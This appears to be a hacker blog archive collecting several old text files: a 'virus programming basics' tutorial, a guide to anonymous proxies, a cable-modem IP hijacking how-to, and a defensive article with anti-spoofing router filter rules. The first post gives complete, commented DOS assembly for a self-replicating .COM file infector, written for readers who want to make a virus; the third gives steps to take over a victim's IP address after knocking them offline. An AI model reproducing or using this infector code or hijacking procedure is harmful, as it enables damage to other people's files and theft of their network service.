---Great Hackers---

Virus programming (basics) #1

2007-07-18T05:09:00.000-07:00

Virus programming (basics) #1...
-----------------------------------------------------------------
This section is dedicated to those who would like to write a
virus, but don't have the knowledge to do so. First of all,
writing a virus is no big deal. It is an easy project, but one
which requires some basic programming skills, and the desire to
write a virus! If either of these is missing, writing a virus
would be tedious indeed!.

Well, if you meet these requisites, keep reading this article....

JE READ
JNE FUCK_YOU!
READ:

The survival of a virus is based in its ability to reproduce. "So
how the fuck do I make a program reproduce?", you might ask.
Simple, by getting it to copy itself to other files....

The functional logic of a virus is as follows:

1- Search for a file to infect
2- Open the file to see if it is infected
3- If infected, search for another file
4- Else, infect the file
5- Return control to the host program.

The following is an example of a simple virus:

;****************************************************************
; START OF THE EXAMPLE:
;****************************************************************
;Warning, this example is a (piece of shit?)
; - The virus does not test for prior infection
; - it searches only for the first .COM file in the current
; directory
;
; Careful when executing this file, since the first time it's
; executed it will search for and infect the first file in the
; directory. If we later run the newly infected file, it will find

; the first file in its directory, itself. Thus, it will re-infect

; itself over and over.
;===================CODIGO=======================================
;(The variables in a .COM file are relative to offset 100h).

codigo segment 'code'
org 100h ;Organize all the code starting
; from offset 100h
assume cs:codigo,ds:codigo,es:codigo ;Define the use of the
;segments

start proc far ;Start the routine
COMIENZO:
push cs ;Store CS
push cs ;Store CS
; once again.
pop ds ;Bring DS out from stack
pop es ;Bring ES out from stack

call falso_proc ;Call proc. so that its
; address is placed in the stack
falso_proc proc near
falso_proc endp

pop bp ;BP<== Proc. address. sub bp, 107h ;BP<== BP - Previous directory ;This is done to take the variables relative to BP, since the ;infection displaces the variables at exactly the length of the ; file. At the first infection, instruction "SUB BP, 107h" is ; 107h, so that the contents of BP is 0; when I call a variable ; with "BP+VARIABLE" the value of the variable's address is not ; modified. When I load it , for example, from a 100h byte ; infected file, the instruction "SUB BP, 107h" leaves me at ; address 207h which means BP=100h, the size of the original file. ; Had I called the variable without adding BP, I would have been ; short by 100h bytes. ;Find the first .COM file in the directory ----------------------------------------- mov ah, 4eh ;Search for the 1st file lea dx, bp+file_inf ;DS:DX= offset of FILE_INF ;(*.*) so it will search all ;the files, including directory ;names with extensions. mov cx, 0000h ;Entry attributes int 21h ;These attributes mentioned in the commentary are the directory's ; entry attributes. When I set the attributes to 0, I'm telling ; DOS to search normal files. If I include a bit combination which ; provides the Hidden, System or Directory attributes, DOS will ; search for files with those attributes, as well as the normal ; files. If the search range includes the Volume bit, the search ; is limited to that.

;These are the bits which correspond to each attribute:
;Bits: 7 6 5 4 3 2 1 0
; . . . . . . . 1 Bit 0: Read only
; . . . . . . 1 . Bit 1: Hidden
; . . . . . 1 . . Bit 2: System
; . . . . 1 . . . Bit 3: Volume
; . . . 1 . . . . Bit 4: Directory
; . . 1 . . . . . Bit 5: File
;
;Bits 6 and 7 are not used as they are reserved for "future
; applications".

;Open file
;----------------------------------------------------------------

mov ah, 3dh ;Open the file.
mov al, 00000010b ;read/write.
mov dx, 009eh ;DX<== DTA(filename) offset int 21h ;put the handle in AX push ax ;and store in stack. ;The attributes I'm setting in AL are not the same as before. ; These are the "open" attributes. We are only interested in the ; first 3 bits, ;bits 2 1 0: ; ; 0 0 0 Read only mode ; 0 0 1 Write only mode ; 0 1 0 Read/Write mode ; ;OK, we now have the file attributes stored in AL. What we now ; need to do is to store in DX the offset of the variable where ; I've stored the ASCIIZ chain with the name of the file to be ; opened. In this case, we don't have a NAME_OF_FILE variable. ; Instead, the name is located in the DTA (Disk Transfer Area). I ; we have it in the DTA...... Why? Simply because when we search ; for a file to infect, all the information we need is returned to ; this memory area. This buffer, if it was not reset, is found in ; the PSP; more precisely, it starts at offset 80h and is 43d bytes ; in size. ; ;The DTA format is as follows: ; ;Offset Bytes Function ; 00h 21d Used by DOS for the 4fh service ; (search for the next file) ; 15h 01d Attributes of the file that's been found ; 16h 02d File time ; 18h 02d File date ; 1Ah 04d File size in bytes ; 1Eh 13d File name in an ASCIIZ chain ; (FILENAME.EXT),0 ; ;Well, all that remains to be doe is to give DX the position in ; memory where I've stored the filename: "MOV DX, E1h" and its's ; done. But careful now, remember that DTA starts at offset 80h, ; which means I have to pass to DX the value "80h+1Eh = 9Eh". That ; would than leave "MOV DX, 9Eh"; the problem is solved. Now you are probably asking yourselves what I mean by "handle". The handle is a number which tells DOS which file we want. DOS gives us a handle for each file we open so we have to be careful to have the correct handle for each file which we read/write. ;Read the first 3 bytes. ----------------------------------------------------- pop bx ;I take the handle from the ;stack to BX push bx ;and I store it again. mov ah, 3fh ;Read file. mov cx, 0003h ;Read 3 bytes. lea dx, bp+buffer ;and store in the buffer. int 21h INFECTAR: ;(infect) ;Move pointer to the start. --------------------------------------------------- mov ax, 4200h ;I move the write pointer ;to the beginning of the program mov cx, 0000h mov dx, 0000h int 21h ;The pointer's displacement, relative to the position of the ; pointer as specified in AL, is placed in CX and DX. ; Pointer displacement modes set in AL: ; AL <== 00 Move pointer to the beginning of the file. ; AL <== 01 leave pointer where it is. ; AL <== 02 Move pointer to end-of-file. ;Write the first byte (jmp) ------------------------------------------------- mov ah, 40h ;write the first byte. mov cx, 1d ;Quantity=1. lea dx, bp+jump ;DX<== JUMP offset int 21h ;(Here we still need the handle, but we don't need to set it again ; because the register which contained the information was not ; modified. ; ;The first byte to be written is a JUMP instruction (the symbol for ; the jump is below). What follows the jump is the address of the ; jump, file-length + 1. (test the "+ 1" thoroughly, since this ; can cause problems; if so, multiply by 18 or subtract 23.) ; Hehehehe. ;Since the entire virus code is copied at the end of the file, the ; jump gives the virus control in an infected file. ;Calculating file length ------------------------------------------------- mov cx, 2 ;Copy 2 bytes. mov si, 009ah ;SI<== DTA offset lea di, bp+longitud ;DI<== File LENGTH offset. rep movsb ;Copy. ;This instruction must have the 'SOURCE' buffer address in DS:SI ; and the address where the string will be copied in ES:DI (in this ; case, I copy the file length of the DTA to the variable ; 'LONGITUD'). sub word ptr [bp+longitud], 3 ;subtract 3 bytes from ;[LONGITUD] ;The JMP is completed -------------------------------------- mov ah, 40h ;Write. mov cx, 2d ;Number of bytes. lea dx, bp+longitud ;DX<== LONGITUD (length) ; offset int 21h ;Move pointer to end ------------------------------------------------------- mov ax, 4202h ;Move the write pointer to the ;end of the program. mov cx, 0000h mov dx, 0000h int 21h add word ptr [bp+longitud],3 ;Restore LONGITUD. ;Copy the virus to the program. --------------------------------------------------- pop bx ;Restore the handle. mov ah, 40h mov cx, 190d ;number of bytes to copy. lea dx, bp+comienzo ;Start copying from.... int 21h ;Close the file after infection ------------------------------------ mov ah, 3eh ;Close file. int 21h ;Here, too, we need in DS:DX the address of the buffer which ; contains the filename string, but in this case DS and DX already ; contain those values from before. NO_INFECTAR: ;==================RETURN CONTROL TO THE HOST===================== ;Copy the buffer which contains the first 3 bytes of the file into ; memory. ------------------ mov cx, 0003h ;Number of bytes (3). mov di, 0100h ;DI<== offset 100h. Beginning of the ;program in memory. lea si, bp+buffer ;SI<== BUFFER offset rep movsb ;Copy. ;What we are doing here is to "fix" the file, since when it was ; infected, the first few bytes are overwritten by the virus. That ; is why we reconstruct the file to its original state, by copying ; the first 3 bytes, which we had stored earlier, into memory. ;Jump to offset 100h -------------------------------------------------------- mov ax, 0100h ;Address needed to execute the host jmp ax ;As we mentioned before, in .COM files the executable code begins ; at offset 100h. The information found between 00h and 100h is ; program data, like the DTA for example. ;The main difference between a .COM file and an .EXE is that a .COM ; cannot occupy more than one memory segment, or 65535 bytes. ; .EXEs can, because DOS can 'tailor' them to fit into a number of ; different segments. Unlike.EXE files. .COM files are faithful ; reproductions of the contents of memory. ;====================DATA AREA=================================== buffer db 7d dup(0) longitud db 2 dup(0) file_inf db '*.COM',0 jump db 'é',0 ;<----jump ascii ;(The character '0' is the end of the ASCIIZ string) start endp ;End of main procedure codigo ends ;end of code segment end comienzo ;END. Go to COMIENZO ;**************************************************************** ; END OF EXAMPLE ;**************************************************************** Drako.

[----Stay anonymous on the web------]

2007-06-13T05:41:00.000-07:00

Note..This tutorial will teach a average day user how to keep all his
Esentual info limited so attacks from Hackers cant be made

SHouth outs: Myth leader of MPD u rule dude,All members of MPD, and
everyone else who i should shout out too u know who u are.

The topics..
1.What are packets.
2.Getting a http proxy.
3.How http proxy work.
4.How to secrure http packets.
5.How to edit what o's and mozilla info send.
6.Getting a socket proxy.
7.How socket proxy work.
8.Cookies.
9.Final note.
-----------------------------------------------------------------------

1.What are packets.

Packets are very simple on the net There are millions of user's now for
secrurity and other reasons there must be ways of establishing difference
between user's Thus is done by packets, Packets are used when ever u connect
to a remote server/system Its identify's who is connecting.
An example of a http packet.( [Connect from MAx.mpd.com]
[206.14.13.32] (Mozilla/4.05 [en] (X11;I;Linux 2.0.34 i586) on December
2, 1998 at 14:34:45 )
Now ill tell u what it is saying if u dont know.
*Note*(Http packets is the way u are sending info through the web
browser whenever u connect to a server/mechine/site )
[connected from MAx.mpd.com]-This is my host
[206.14.13.32]- is my ip
(Mozilla/4.05)- is the version of mozilla im using
(X11;I;Linux 2.0.32 i586)- Is The O's(operating system) And version of
the o's im running
[On december 2, 1998 at 14:34:45] - is day/year/time
Now u know how it works this is one way Hackers get all the info they
need on your computer to hack it.
Now we dont want this anymore THus anonymous proxies where invented to
give keep user's on the net secrure.Using anonymous proxies isnt
100% secrure as the hacker can still do means on getting your real
ip/host/os ill talk about that later but it makes it very hard for a hacker
to get your ip/host once behind a proxy.
Now http isnt the only means of packets there are also socket packets which
ill talk about later.

2.How http proxy work.
A http proxy works like server it is actuelly and what it does is when
setup in your browser when ever u want to go to sites.It will connect
to there proxy server first then the proxy server conncts to the site
u want to go to THus leaving no evendence of u on the site just the
proxy server.(Dont worry once u setup a proxy dont think u always have
to type in the proxy in first then go to there and type the site u want
too go to. :)It dont work like that once u have entered the proxy settings
in ya browser it will auto do the proxy for u all u have to do is surf the
net.(Setting up a http proxy descussed later)

3. Getting a http proxy
Http proxies are very easyly found on the net as there are many
commited Http proxy server's around that are free.
Ill give a list of some http proxies for your all sorry if your
country proxy isn't here just search on the net for (Http proxy)
and ull find one.
***Austria*** Port
cache02.netway.at :80
mail.ppl.co.at :8080
speth08.wu-wien.ac.at :8080
pong.ping.at :8080

***Australia***
proxy.gwbbs.net.au :80
chrome.one.net.au :8080
proxy.newave.net.au :8080
ws.edi.com.au :80
mimas.scu.edu.au :80
proxy.omcs.com.au :8080
jethro.meriden.pas.com.au:8080
albany.jrc.net.au :80
basil.acr.net.au :8080

***Belgium***

cache-mar.belbone.be :80

***Bulgaria***

conan.gocis.bg :8080

***Brazil***

200.250.14.5)ct-nt-02.cybertelecom.com.br :8080
sanan.com.br :8080

***Canada***
proxy.collegemv.qc.ca :8080
srvprx.cspaysbleuets.qc.ca :80
valliere.csvalliere.qc.ca :80
keeper.albertc.on.ca :8080
cproxy1.justice.gc.ca :80
proxy.cslouis-hemon.qc.ca :8080
gateway.kwantlen.bc.ca :80

***Switzerland***

cache1.worldcom.ch :8080
cache2.worldcom.ch :8080
cache3.worldcom.ch :8080
web-cache-2.cern.ch :80
proxy.span.ch :8080
gip-lausanne-nc.globalip.ch :80
gip-lausanne-cf2.globalip.ch :8080
gip-lausanne-cf1.globalip.ch :8080
proxy2.iso.ch :8080
proxy.iprolink.ch :80

***China***

proxy.szptt.net.cn :8080
***United States***

hpux.mesd.k12.or.us :8080
gatekeeper.ci.slc.ut.us :8080
episd.elpaso.k12.tx.us :8080
svc.logan.k12.ut.us :8001
proxy.eup.k12.mi.us :8080
svc.nues.k12.ut.us :8001
proxy.eup.k12.mi.us :8080
(207.78.252.100)oakweb.oak-web.washington-ch.oh.us :80
homnibus.nvc.cc.ca.us :80
et.mohave.cc.az.us :80

(ok id say i gave out enough if ya local country not there go search
the net and if cant find use another country one that is close to u)

4.How to secrure Http packets
Like i said before this is a normal http packet
( [Connect from MAx.mpd.com]
[206.14.13.32] (Mozilla/4.05 [en] (X11;I;Linux 2.0.34 i586) on December
2, 1998 at 14:34:45 )
Now to Make your ip and host anonymous to web browsing we are going to
use http proxy with ya browser.THis is done by going to ya options
and finding the info on proxy settings in thus put in all
avalable places in proxy setting etc.ftp,http,secruity,
Except leave sockets part blank THis isnt a socket proxy its a http
Now after setting up a proxy in the proxy settings and putting in the
port too.Our new packets will look like this.
( [Connect from The_proxies_host]
[The_proxies_ip] (Mozilla/4.05 [en] (X11;I;Linux 2.0.34 i586) on December
2, 1998 at 14:34:45 )
Now u might be thinking cool :) No longer have everdence of me on there
server but dam they know my o's and version of mozilla later on ill
descuse how to change that.U might also be thinking WOW now i can surf
100% secure on the net.U are not totally right.IF a hacker had a real
grunge on u.He has now the proxy u are using there ip/host
now if he wants to get your info that badly he would have to hack
the proxy server comapare the log time of the time u loged to the hacker's
site too the logs of your connection to the proxy server.THus is a real
big job and if pick a good proxy server they will be very secure from
attack's So your pritty much safe.

5.How to edit the o's and mozilla info send.

Ok if your using Ie this is how u would do it.
To see Original Settings
GOTO HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
User Agent = Mozilla/4.0 (compatible; MSIE 4.01; Windows 95; (Your Orginial Settings))

(Skip this Part here)
GOTO HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
ProductName = Microsoft Windows 95
Version = Windows 95

GOTO HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
(Your Orignial Settings Here) = IEAK(Your Orignial Settings Here)

Example

GOTO HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
Myth [Unix-Base] = IEAKMyth [Unix-Base]

*Note (this info on how to change the mozilla and version shown was
given to me from Myth i didn't make it.)

6.Getting a socket proxy.

Ok now socket proxies work like Http proxies the only diff is
socket proxies are used with programs like (icq,mirc) And the packets
are send through sockets not http.Getting a socket proxy is alot harder
because Socket proxy server's have to be dedicated to a sertain program
so its very limiting to the amount of user's he will get.
Http is always used its using the web everyone uses it so http proxies
are always going to be in need.
TO find a socket proxy u can search the net typing in (Socket proxy)
or try for sertain program's names like (Icq proxy).
Hopefully u will get one
socket proxies are useful as alot of attacks on user's are done
by kids with nukes,spring,ping,smurf,etc etc And thus will anoy a user
in mirc or from icq both these programs give any user possability to
get a user's ip/host.
thats why if u use these u will want a socket proxy.
Alot of people go why dont u just use ident or jizz or something
for mirc and icq.Well the reason u don't as there are expolits out
there to crash spoofed hosts/ip for programs like jizz and ident
a proxy is more stable way and more prevention then a spoofer program.

Cable Modem IP Hijacking in Win95/98

2007-05-23T04:37:00.000-07:00

Cable Modem IP Hijacking in Win95/98

The purpose of this is to show you how bad cable modems security is and that
even with a win box you can take someone else's IP. You can hijack IP's using
a cable modem and it's very simple in any operating system. Just follow the
steps:

1) Choose someone's IP that you wish to have. Make sure the IP is on the same
network. Most cable modem providers use DHCP. The fist thing you have to
do is find the victims IP. Remember the victims IP has to be in the same
network and with the same service provider for this to work.

2) Now this is probably the hardest thing in this file (but it's still easy),
you have to wait until the victims computer is off or you can Smurf kill
his connection. When you think his computer is off-line just try to ping
it to see if you get a response. Do this by going to a DOS prompt and
typing "ping ". If you get a response then you have to try
harder.

After you get his PC off-line then you go into your network properties and
edit the IP settings, but instead of having yours there you put the victims
IP, host, and domain.

3) Restart. If you restart and you get an IP conflict this means that the
victims computer is on, if you don't get an IP conflict then try to go to
your web browser and see if it works. With some cable modem providers you
might have to also add the Gateway, Subnet mask (255.255.55.0), Host, DNS
search, and Domain.

Now you can go. Everything will work until the victims PC is back on. Once it is
back online it will take the IP away because it will tell you that you have the
wrong Mac addresses.

*Linux*
This is also possible in Linux, but is not the best way. You can change your Mac
address to the victims PC and this is more secure and much easier. There are a
couple of scripts to change your address, just look around.

Warning: Some cable modem service providers will know when you're using the wrong
IP, but hey, it might be useful.

INTERNET HOLES - ELIMINATING IP ADDRESS FORGERY

2007-05-07T05:28:00.000-07:00

INTERNET HOLES - ELIMINATING IP ADDRESS FORGERY
COPYRIGHT (C), 1996, MANAGEMENT ANALYTICS - ALL RIGHTS RESERVED
_________________________________________________________________

The Internet is now the world's most popular network and it is full of
potential vulnerabilities. In this series of articles, we explore the
vulnerabilities of the Internet and what you can do to mitigate them.

An Introduction IP Address Forgery

The Internet Protocol (IP) (RFC791) provides for two and only two
functions. It defines a datagram that can be routed through the
Internet, and it provides a means for fragmenting datagrams into
packets and reassembling packets into the original datagrams. To quote
from RFC791:
The internet protocol is specifically limited in scope to provide the
functions necessary to deliver a package of bits (an internet
datagram) from a source to a destination over an interconnected
system of networks. There are no mechanisms to augment end-to-end
data reliability, flow control, sequencing, or other services
commonly found in host-to-host protocols. The internet protocol
can capitalize on the services of its supporting networks to
provide various types and qualities of service.

Here's a description of an IP datagram, also from RFC791:

0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL |Type of Service| Total Length |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |Flags| Fragment Offset |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Time to Live | Protocol | Header Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Options | Padding |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| data |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| data |
\ \
\ \
| data |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| data |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Description of an IP Datagram

Note that the 4th line of the description calls for the Source Address
of the datagram. In the simplest form of IP address forgery, the
forger only needs to create a packet containing a false Source Address
and insert it into the Internet by writing it into the output device
used to send information to the rest of the Internet. For the
non-expert forger, there is a tool called iptest which is part of the
free and publicly available ipfilter security package that
automatically forges packets for the purpose of testing configurations
or routers and other IP security setups.

The infrastructure of the Internet consists primarily of a set of
gateway computers and packet routers. These systems have multiple
hardware interfaces. They maintain routing tables to let them decide
which output interface to send a packet out on based on the input
interface that it came in on and the destination IP address specified
in the packet. When a forged packet arrives at an infrastructure
element, that element will faithfully route the packet toward the
destination address, exactly as it would a legitimate packet.

How Can IP Address Forgery Be Used

At its root, IP address forgery is a method of deception, and thus it
can be used in much the same way as other forms of deception.
Dunnigan95 More specifically, and using Dunnigan and Nofi's
classification scheme, here are some quick ideas about how IP address
forgery might be used:
* Concealment: IP address forgery is commonly used to conceal the
identity of an attacker, especially when denial of services is the
goal of the attack.
* Camouflage: IP address forgery is used to make one site appear to
be another as a way to convince the victim, for example, that an
attack is from a University, when in fact it is from a competitor.
* False and Planted Information: IP address forgery can be used to
create the impression that a particular site is acting maliciously
in order to create friction or lead a defender to falsely accuse
an innocent third party.
* Reuses: IP address forgery can be used to support another activity
designed to gain the confidence of the defender. For example, a
salesperson for information security products could create IP
address forgeries in order to convince a client of the need for
their services.
* Displays: IP address forgery has been used in order to lead
defenders to believe that many sites are participating in an
attack when in fact only a small number of individuals are
responsible.
* Demonstrations: IP address forgery has been used to demonstrate a
potential for untraceable attacks as a way to convince defenders
not to try to catch attackers.
* Feints: IP address forgery can be used to try to fool an enemy
into believing that an attack is coming from outside or from a
particular direction, when the real attack is very different. This
is a way to misdirect the enemy into spending limited resources in
the wrong way.
* Lies: IP address forgery has been used to create a more convincing
lie that somebody known to the defender is communicating with them
about a particular matter.
* Insight: IP address forgery can be used to gain insight into how
an opponent reacts and as a sort of probe to determine what sorts
of responses are likely to arise.

Another way to view this issue is in terms of the net effect on
information in information systems. Here is another way of viewing
this issue with an example from each category.
* Corruption of Information: IP addresses are often used as the
basis for Internet control decisions. For example, DNS updates are
often designated as coming only from specific other servers. With
IP address forgery, the entire DNS system could be corrupted,
causing services to be rerouted through enemy servers.
* Denial of Services: The Internet is basically a fragile network
that depends on the proper behavior and good will of the
participants for its proper operation. Without wide-ranging
changes to the way the Internet works, denial of services is
almost impossible to prevent. For example, the same DNS attack
could be used to cause widespread denial of services, or perhaps
even to create loops in the packet delivery mechanisms of the
Internet backbone.
* Leakage of Information: Forged IP addresses can be used to cause a
host to take orders for the delivery of information to enemy sites
by forging authorization as if it were from a legitimate
authorizing site.
* Misplaced Liability: Forged IP addresses could be used, as
described above under False and Planted Information, to cause
defenders to assert claims against innocent bystanders and to lay
blame at the wrong feet.

These are only some of the examples of what forged IP addresses can
do. Without a lot of effort, many other examples can be created.

What Can We Do About It?

As individuals, there is little we can do to eliminate all IP address
forgery, but as a community, we can be very effective. Here's how.
Instead of having all infrastructure elements route all packets, each
infrastructure element could, and should, enforce a simple rule. They
should only route packets from sources that could legitimately come
from the interface the packet arrives on.

This may sound complicated, but it really isn't. In fact, the
technology to do this is already in place, and always has been.
Virtually every router and gateway in existence today allows for the
filtering of packets based on their input interface and IP source and
destination address. This is a necessary component of their operation
and is the basis for the way they route all packets.

The only change that has to be made is for these routers and gateways
to enforce the network structure that is legitimately in place. Or in
other words, the routers and gateways should refuse to route
ridiculous packets. Here are some of the simpler examples of known bad
packets:
* The IP address 127.0.0.1 is ONLY used for internal routing of
packets from a host to itself. There is no legitimate IP datagram
that should pass through a router or gateway with this as the
source address. In fact, routing these packets is dangerous
because they may be used to forge packets from the localhost which
often has special privileges. A recent attack that causes denial
of services involves sending a packet to a host's echo port with
127.0.0.1 as its source address and the echo port as it's source
port. The echo port causes whatever packet it is sent to be
returned to its source. Since the source address is the same port
on the same host, this packet creates an infinite loop which, in
many cases, disables the computer.
* The IP address 0.0.0.0 is not legitimate - full stop. In fact,
there's really no legitimate IP address that should traverse
gateways containing a 0 for one of the address elements.
Unfortunately, many routers use the '.0.' convention in their
filtering tables to indicate any address from 0 to 255 (the whole
range), so blocking these packets may be non-trivial in some
infrastructure elements.
* The IP specification includes provisions for private subnetworks
that are designated for internal use only. There is no legitimate
reason to route packets from these addresses anywhere in the
general Internet infrastructure. (RFC1597) These address ranges
include 10.*.*.*, 172.16-32.*.*, and 192.168.*.* (where *
indicates any value from 0 through 255). No packets should be
routed through the Internet with these addresses as either their
source or their destination.

The next step in eliminating IP address forgery is for the routers and
gateways at each type of infrastructure element to enforce standards
on each interface. Generally, the Internet is broken up into Backbone
providers that provide wide area packet transport services, Private
Networks which are owned and operated by companies, institutions,
government agencies, and other parties for their own purposes, and
Internet Service Providers (ISPs) that provide connections between
the backbone elements and private networks (sometimes including other
ISPs). These roles can be blurred at times, but they are adequate for
our purposes.
* Private Networks: Each private network should;
+ 1) prevent all of the known-bad packets from crossing into or
out of the organization,
+ 2) prevent packets with internal source addresses from
passing inward,
+ 3) prevent packets with external source addresses from
passing outward,
+ 4) prevent packets with external destination addresses from
passing inward, and
+ 5) prevent packets with internal destination addresses from
passing outward.
* ISPs: Each ISP should;
+ 1) prevent all of the known-bad packets from crossing into or
out of their infrastructure,
+ 2) prevent any packet inbound from any of their clients with
a source address not from that client's assigned address
range from passing from the client network,
+ 3) prevent any packets with a destination address not in
their client's address range from passing to the client
network,
+ 4) prevent any packet not from this ISP's legitimate address
range from entering the backbone, and
+ 5) prevent any packets originating from the backbone and not
destined for one of their legitimate IP addresses from
entering their network.
Two additional rules will assist the ISP's clients;
+ 6) prevent inbound traffic from the client with the client's
address as a destination, and
+ 7) prevent outbound traffic to the client with the client's
address claimed to be the source.
* Backbone Networks: Each backbone provider should;
+ 1) prevent all of the known-bad packets from crossing into or
out of their infrastructure,
+ 2) prevent packets originating from any ISP with source
addresses not in that ISP's range of legitimate source
addresses from entering the backbone,
+ 3) prevent any packets not destined for an ISP's address
range from entering that ISP,
+ 4) prevent any packets from any other backbone provider that
could not be properly routed through that provider from
entering their backbone, and
+ 5) prevent any packets from going to any other backbone
provider unless they could legitimately be routed through
that provider to reach their destination.
For backbones, this requires some effort, however the high volume of
information they carry certainly justifies a little effort for
protection.

Some Examples
As an aide to the less technically inclined, the following examples
provide some real world implementation details.

This set of rules applies to a private network (in this case, the
all.net class C network 204.7.229.*) and are written in the format of
the Morningstar PPP (point to point protocol) Filter file:

# Rule 1 for private networks
# prevent known-bad address ranges from entering (or leaving)
!172.16-32.0.0 # private network segment
!192.168.0.0 # private network segment
!10.0.0.0 # private network segment
!127.0.0.0 # localhost network
# Rule 2 for private networks
# prevent internal source address packets from passing inward
!recv/src/204.7.229.0 # prevent inbound from our network
# Rule 5 for private networks
# prevent internal destination addresses from passing outward
# Note that rule 5 is placed here because the filters are order dependent
!send/dst/204.7.229.0 # prevent our destinations from passing out
# Rule 3 for private networks
# prevent external source address packets from passing outward
send/src/204.7.229.0 # allow legitimate outbound sources
!send/src/0.0.0.0 # prevent illegitimate outbound sources
# Rule 4 for private networks
# prevent external destinations from passing inward
recv/dst/204.7.229.0 # allow legitimate inbound destinations
!recv/dst/0.0.0.0 # prevent illegitimate inbound destinations

The next set of rules applies to an ISP. In this case, we assume that
the ISP has control over three class B networks that it uses to sell
services to its clients. The class B networks used in this example
have IP addresses of 123.7.*.*, 231.6.*.*, and 201.96.*.*. In this
case, we have three different parts of the example:

This is the router connecting the ISP to the backbone, presented in
the format of a Cisco router with interface 0 connected to the
backbone and interface 1 connected to the ISP's internal network. It
implements rules 1, 4, and 5 for the ISP.

# Rule 1 for an ISP
# prevent all of the known-bad address ranges
# this should be done on all in and out connections
# on all interfaces in all access control lists
All interfaces in and out
deny ip 172.16-32.0.0 # private network segment
deny ip 192.168.0.0 # private network segment
deny ip 10.0.0.0 # private network segment
deny ip 127.0.0.0 # localhost network

# Rule 2 for an ISP
# prevent inbound from client not in client's address range
# DONE ELSEWHERE

# Rule 3 for an ISP
# prevent entry of packets not destined clients from passing their way
# DONE ELSEWHERE

# Rule 4 for an ISP
# prevent exit of packets not from our class Bs
# on interface 0 (backbone) out filter
Interface 0 out
permit ip 123.7.0.0
permit ip 231.6.0.0
permit ip 201.96.0.0
deny ip 0.0.0.0

# Rule 5 for an ISP
# prevent entry of packets not destined for our class Bs.
# on interface 0 (backbone) in filter
Interface 0 in
permit ip 123.7.0.0
permit ip 231.6.0.0
permit ip 201.96.0.0
deny ip 0.0.0.0

Next, we implement rules 2 and 3 for each client by creating separate
(in this example ppp) filters on the ISP's gateway computer. Again,
using the Morningstar ppp Filter format and assuming that Class C IP
network 201.96.1.* is assigned to this particular client:

# Rule 1 for ISPs
# prevent known-bad address ranges from entering (or leaving)
!172.16-32.0.0 # private network segment
!192.168.0.0 # private network segment
!10.0.0.0 # private network segment
!127.0.0.0 # localhost network
# Rule 6 for an ISP
# prevent inbound traffic from the client destined for the client
# note that rule 6 is placed here because filters are order dependent
!recv/dest/201.96.1.0 # prevent inbound from client to self
# Rule 7 for an ISP
# prevent outbound traffic to the client claimed to be from the client
# note that rule 7 is placed here because filters are order dependent
!send/src/201.96.1.0 # prevent outbound to client from client
# Rule 2 for an ISP
# prevent inbound from client not in client's address range
recv/src/201.96.1.0 # allow legitimate traffic
!recv/src/0.0.0.0 # prevent all other traffic
# Rule 3 for an ISP
# prevent entry of packets not destined clients from passing their way
send/dest/201.96.1.0 # allow legitimate traffic
!send/dest/0.0.0.0 # prevent all other traffic

Note that redundant protection is provided in several ways. The ISP
protects the clients from backbone forgery both at the backbone router
and at the client's ppp connection, and protects the backbone from IP
forgery emanating from the ISP both by preventing forgery from clients
and by preventing forgery from within the ISP. Similarly, the ISP
provides redundant protection against improperly configured client
hardware and software. The last two filter rules are to assure that
even if the client is not properly configured to prevent forgery of
internal addresses from the outside world or to prevent internal
traffic from being sent out, this traffic is prevented.

This last example is a simplification of a wide area backbone network
in which this particular router (no type specified) is at the junction
between UK connections and non-UK connections. In this case, it is a
reasonable assumption that all internal UK traffic should remain
internal and that external traffic that gets to this node should be
sent out of the UK never to return. This particular backbone node will
be connected to non-UK traffic on interface 0, our previously
described ISP on interface 1, and the rest of the internal UK backbone
on interface 2.

# Rule 1 for a backbone
# prevent all of the known-bad packets from crossing
all-interfaces prevent in/out 172.16-32.0.0 # private network segment
all-interfaces prevent in/out 192.168.0.0 # private network segment
all-interfaces prevent in/out 10.0.0.0 # private network segment
all-interfaces prevent in/out 127.0.0.0 # localhost network

# Rule 2 for a backbone
# prevent packets originating from any ISP with non-ISP source address
interface-1 allow in from 123.7.0.0 # ISP traffic
interface-1 allow in from 231.6.0.0 # ISP traffic
interface-1 allow in from 201.96.0.0 # ISP traffic
interface-1 prevent in from 0.0.0.0 # no other inbound traffic

# Rule 3 for a backbone
# prevent packets not destined for an ISP from going there
interface-1 allow out to 123.7.0.0 # ISP traffic
interface-1 allow out to 231.6.0.0 # ISP traffic
interface-1 allow out to 201.96.0.0 # ISP traffic
interface-1 prevent out to 0.0.0.0 # no other outbound traffic

# Rule 4 for a backbone
# prevent packets from other backbones that shouldn't come this way
interface-0 allow in to UK-1 # UK traffic
interface-0 allow in to UK-2 # UK traffic
...
interface-0 allow in to UK-n # UK traffic
interface-0 prevent in to 0.0.0.0 # no other inbound traffic

